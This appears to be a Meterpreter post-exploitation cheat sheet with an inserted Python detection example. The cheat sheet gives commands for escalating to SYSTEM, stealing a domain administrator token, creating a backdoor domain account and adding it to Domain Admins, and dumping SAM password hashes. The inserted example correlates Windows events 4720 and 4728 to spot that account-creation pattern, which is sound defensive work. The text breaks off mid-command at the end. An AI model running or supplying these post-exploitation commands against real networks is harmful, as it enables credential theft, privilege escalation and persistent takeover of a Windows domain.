Meterpreter Post Exploitation Commands
Elevate your permissions on Windows-based systems using Meterpreter:
meterpreter > use priv
meterpreter > getsystem
Steal a domain administrator token from a given process ID, add a domain account, and then add it to the Domain Admins group:
meterpreter > ps
meterpreter > steal_token 1784
meterpreter > shell
C:\Windows\system32>net user metasploit p@55w0rd /ADD /DOMAIN
C:\Windows\system32>net group "Domain Admins" metasploit /ADD /DOMAIN
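Seen from the domain controller, the two net commands above produce Security log event 4720 (a user account was created) followed by event 4728 (a member was added to a security-enabled global group). The following is an added example, not part of the original text, that correlates the two over constructed sample records; the record layout and field names are simplified assumptions, not a real log export format.

```python
from datetime import datetime, timedelta

# Constructed sample records, simplified from Windows Security log events.
# Field names (time, event_id, target, group, actor) are assumptions for this example.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:05", "event_id": 4720, "target": "metasploit", "actor": "jsmith"},
    {"time": "2024-05-01T10:00:40", "event_id": 4728, "target": "metasploit",
     "group": "Domain Admins", "actor": "jsmith"},
    {"time": "2024-05-01T11:00:00", "event_id": 4720, "target": "newhire", "actor": "helpdesk"},
    {"time": "2024-05-01T15:30:00", "event_id": 4728, "target": "newhire",
     "group": "Sales", "actor": "helpdesk"},
    # Existing account promoted: no matching 4720, so not part of this pattern.
    {"time": "2024-05-02T09:00:00", "event_id": 4728, "target": "olduser",
     "group": "Domain Admins", "actor": "admin1"},
]

# Global groups whose membership changes are reported as event 4728.
PRIVILEGED_GROUPS = {"domain admins"}


def find_rapid_privileged_adds(events, window=timedelta(minutes=10)):
    """Flag accounts created (4720) and added to a privileged group (4728) within `window`."""
    created = {}  # lowercase account name -> creation time
    alerts = []
    # ISO 8601 timestamps in one format sort correctly as strings.
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        name = ev["target"].lower()
        if ev["event_id"] == 4720:
            created[name] = when
        elif ev["event_id"] == 4728 and ev.get("group", "").lower() in PRIVILEGED_GROUPS:
            born = created.get(name)
            if born is not None and when - born <= window:
                alerts.append({
                    "account": ev["target"],
                    "group": ev["group"],
                    "actor": ev["actor"],  # with a stolen token, this is the token's owner
                    "seconds_after_creation": int((when - born).total_seconds()),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_rapid_privileged_adds(SAMPLE_EVENTS):
        print(alert)
```

The actor recorded on both events is the account whose token was in use, so an alert naming a legitimate administrator still warrants checking which host and process the change came from.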
Dump password hashes from the SAM database:
meterpreter > use priv
meterpreter > getsystem
meterpreter > hashdump
Note
On Win2k8 you may need to migrate to a process that is running as SYSTEM if getsystem and hashdump throw exceptions.
Automigrate to a separate process:
meterpreter ...